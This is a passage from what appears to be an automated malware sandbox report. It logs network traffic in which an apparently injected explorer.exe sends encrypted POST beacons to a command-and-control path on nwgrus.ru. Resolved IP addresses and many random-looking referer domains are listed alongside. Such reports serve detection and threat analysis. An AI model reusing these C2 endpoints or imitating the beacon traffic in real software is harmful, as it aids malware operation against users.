Oct 14, 2024 01:55:17.944026947 CEST	80	50046	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:17.944119930 CEST	50046	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:17.945818901 CEST	50046	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:17.950668097 CEST	80	50046	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:22.605346918 CEST	50047	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:22.610667944 CEST	80	50047	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:22.610780001 CEST	50047	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:22.610935926 CEST	50047	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:22.610937119 CEST	50047	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:22.616003990 CEST	80	50047	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:22.616033077 CEST	80	50047	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:24.219738007 CEST	80	50047	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:24.265830994 CEST	80	50047	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:24.265966892 CEST	50047	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:24.266062975 CEST	50047	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:24.271219969 CEST	80	50047	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:28.579772949 CEST	50048	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:28.585165024 CEST	80	50048	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:28.585268974 CEST	50048	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:28.585405111 CEST	50048	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:28.585429907 CEST	50048	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:28.591015100 CEST	80	50048	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:28.591054916 CEST	80	50048	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:30.260673046 CEST	80	50048	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:30.261689901 CEST	80	50048	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:30.261755943 CEST	50048	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:30.261805058 CEST	50048	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:30.266617060 CEST	80	50048	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:35.112736940 CEST	50049	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:35.118083000 CEST	80	50049	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:35.118192911 CEST	50049	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:35.118352890 CEST	50049	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:35.118386984 CEST	50049	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:35.123316050 CEST	80	50049	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:35.123713970 CEST	80	50049	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:37.592566013 CEST	80	50049	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:37.612277985 CEST	80	50049	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:37.612386942 CEST	50049	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:37.612437963 CEST	50049	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:37.617403030 CEST	80	50049	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:42.377270937 CEST	50050	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:42.383109093 CEST	80	50050	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:42.383168936 CEST	50050	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:42.383274078 CEST	50050	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:42.383285999 CEST	50050	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:42.389940023 CEST	80	50050	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:42.389952898 CEST	80	50050	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:44.025274038 CEST	80	50050	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:44.029972076 CEST	80	50050	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:44.030056953 CEST	50050	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:44.030113935 CEST	50050	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:44.036514044 CEST	80	50050	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:48.551573038 CEST	50051	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:48.556894064 CEST	80	50051	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:48.557096958 CEST	50051	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:48.557193041 CEST	50051	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:48.557193041 CEST	50051	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:48.562792063 CEST	80	50051	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:48.562820911 CEST	80	50051	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:51.157521009 CEST	80	50051	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:51.157830954 CEST	80	50051	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:51.158024073 CEST	50051	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:51.160254002 CEST	50051	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:51.165204048 CEST	80	50051	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:55.317894936 CEST	50052	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:55.323106050 CEST	80	50052	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:55.323280096 CEST	50052	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:55.323379040 CEST	50052	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:55.323379040 CEST	50052	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:55.328490019 CEST	80	50052	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:55.328653097 CEST	80	50052	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:56.957978010 CEST	80	50052	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:56.961333036 CEST	80	50052	58.151.148.90	192.168.2.4
Oct 14, 2024 01:55:56.961549997 CEST	50052	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:56.961550951 CEST	50052	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:55:56.966809034 CEST	80	50052	58.151.148.90	192.168.2.4
Oct 14, 2024 01:56:01.906378984 CEST	50053	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:56:01.911695004 CEST	80	50053	58.151.148.90	192.168.2.4
Oct 14, 2024 01:56:01.911793947 CEST	50053	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:56:01.911906958 CEST	50053	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:56:01.911933899 CEST	50053	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:56:01.917319059 CEST	80	50053	58.151.148.90	192.168.2.4
Oct 14, 2024 01:56:01.917346954 CEST	80	50053	58.151.148.90	192.168.2.4
Oct 14, 2024 01:56:03.562711000 CEST	80	50053	58.151.148.90	192.168.2.4
Oct 14, 2024 01:56:03.563688040 CEST	80	50053	58.151.148.90	192.168.2.4
Oct 14, 2024 01:56:03.563735008 CEST	50053	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:56:03.563791990 CEST	50053	80	192.168.2.4	58.151.148.90
Oct 14, 2024 01:56:03.568773985 CEST	80	50053	58.151.148.90	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 01:52:26.241811037 CEST	53554	53	192.168.2.4	1.1.1.1
Oct 14, 2024 01:52:26.249304056 CEST	53	53554	1.1.1.1	192.168.2.4
Oct 14, 2024 01:54:14.237809896 CEST	63940	53	192.168.2.4	1.1.1.1
Oct 14, 2024 01:54:15.225946903 CEST	63940	53	192.168.2.4	1.1.1.1
Oct 14, 2024 01:54:15.434916019 CEST	53	63940	1.1.1.1	192.168.2.4
Oct 14, 2024 01:54:15.434993982 CEST	53	63940	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 14, 2024 01:52:26.241811037 CEST	192.168.2.4	1.1.1.1	0x3d83	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:14.237809896 CEST	192.168.2.4	1.1.1.1	0x1a3b	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.225946903 CEST	192.168.2.4	1.1.1.1	0x1a3b	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 14, 2024 01:52:26.249304056 CEST	1.1.1.1	192.168.2.4	0x3d83	No error (0)	nwgrus.ru	189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:52:26.249304056 CEST	1.1.1.1	192.168.2.4	0x3d83	No error (0)	nwgrus.ru	190.147.2.86	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:52:26.249304056 CEST	1.1.1.1	192.168.2.4	0x3d83	No error (0)	nwgrus.ru	181.123.219.23	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:52:26.249304056 CEST	1.1.1.1	192.168.2.4	0x3d83	No error (0)	nwgrus.ru	187.209.194.244	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:52:26.249304056 CEST	1.1.1.1	192.168.2.4	0x3d83	No error (0)	nwgrus.ru	180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:52:26.249304056 CEST	1.1.1.1	192.168.2.4	0x3d83	No error (0)	nwgrus.ru	183.100.39.16	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:52:26.249304056 CEST	1.1.1.1	192.168.2.4	0x3d83	No error (0)	nwgrus.ru	189.163.31.73	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:52:26.249304056 CEST	1.1.1.1	192.168.2.4	0x3d83	No error (0)	nwgrus.ru	189.61.54.32	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:52:26.249304056 CEST	1.1.1.1	192.168.2.4	0x3d83	No error (0)	nwgrus.ru	200.45.93.45	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:52:26.249304056 CEST	1.1.1.1	192.168.2.4	0x3d83	No error (0)	nwgrus.ru	58.151.148.90	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434916019 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	58.151.148.90	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434916019 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	190.13.174.94	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434916019 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	123.212.43.225	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434916019 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	189.181.56.137	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434916019 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	95.86.30.3	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434916019 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434916019 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	154.144.253.197	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434916019 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434916019 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434916019 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434993982 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	58.151.148.90	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434993982 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	190.13.174.94	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434993982 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	123.212.43.225	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434993982 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	189.181.56.137	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434993982 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	95.86.30.3	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434993982 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434993982 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	154.144.253.197	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434993982 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434993982 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 14, 2024 01:54:15.434993982 CEST	1.1.1.1	192.168.2.4	0x1a3b	No error (0)	nwgrus.ru	46.100.50.5	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dylagwrgixlfmu.com

nwgrus.ru

ibgfkpdryxjpgnqh.com

eantthlyjjcdj.org

shpbhnktrtag.net

wcfffybtpterbqpa.net

xnobteannnesvysc.com

tapxxmacigntnnfe.com

vammwtwbjec.org

akhsodkspgrml.net

tsjfluqkxyqldltv.com

xiohrwbimqciogt.org

omlvjsbjwgbtt.com

vsbjnemdwavwq.net

lothfyrshwumy.net

minslgtmvtn.com

ccnaltwqqqsxov.net

stlewbfilnqojsrv.com

egmeddtwjwiedt.com

gklgbytfsyxm.org

aovitjibeagnbys.net

snussmiqvhuxlm.org

lldjdgortos.org

syoedasuherii.org

njefqjlwqiadunh.org

tdojljspnss.net

eodrfdbgkbdgmox.com

cguufeaxdioixvo.net

hbtkpieyfdv.com

nannolqtxvdvgf.org

pjnfdjwducxdwna.com

bvawnwiwcpmgflx.org

yocwufliskskpcvu.com

bfjqfyqpqtyfp.com

xknbcflanypqj.net

fgbayjdhmimo.net

ecwlvrprlkc.net

pfvfrxtosmhgis.com

qrcepyiavbj.net

jbughtdilxsi.org

adulmxafuqyrwioa.org

ibqsdsbooxlotmkk.com

firvhcleclspvqf.net

wastiylaaiv.org

gmunjwtmmqbkfjxj.com

ekdlxdwusihebwve.org

ytxsvmhxdoiv.net

cjgfbmyhhfmho.com

ewwaevdbcqu.com

paccyqypahp.org

vobnbocmacccbp.net

crbgbhwlxoevenop.net

ghpsevkbljqmyuby.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:26.256912947 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dylagwrgixlfmu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 114 Host: nwgrus.ru
Oct 14, 2024 01:52:26.256913900 CEST	114	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 50 a3 fc Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA .[k,vuwPI)RvN~eX{fdt
Oct 14, 2024 01:52:27.352427959 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:27.365040064 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ibgfkpdryxjpgnqh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 273 Host: nwgrus.ru
Oct 14, 2024 01:52:27.365065098 CEST	273	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 70 32 a7 eb Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vup2l>pjdc"u(<~$rrwrB*)5&6Of8\!+v`[;^T{uU,>SdP9Fz{<ve{l>#6'
Oct 14, 2024 01:52:28.476666927 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:28.485728979 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eantthlyjjcdj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 133 Host: nwgrus.ru
Oct 14, 2024 01:52:28.485752106 CEST	133	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 5b 5e c9 a6 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vu[^:yI{M^Qh*I^}gaSB
Oct 14, 2024 01:52:29.577939987 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:29.586394072 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://shpbhnktrtag.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 304 Host: nwgrus.ru
Oct 14, 2024 01:52:29.586394072 CEST	304	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 58 46 ef e4 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vuXFd_FmpWt0mdPW$cW$$R,.129{lc u2eNVI0Po_=GV2hME>+4dH8_p
Oct 14, 2024 01:52:30.712194920 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:30 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:30.745536089 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wcfffybtpterbqpa.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 159 Host: nwgrus.ru
Oct 14, 2024 01:52:30.746463060 CEST	159	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 66 2e e7 e0 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vuf.}}@i"paTzy5C4+}$X:-O-%^:zx
Oct 14, 2024 01:52:31.838764906 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:31.855186939 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xnobteannnesvysc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 343 Host: nwgrus.ru
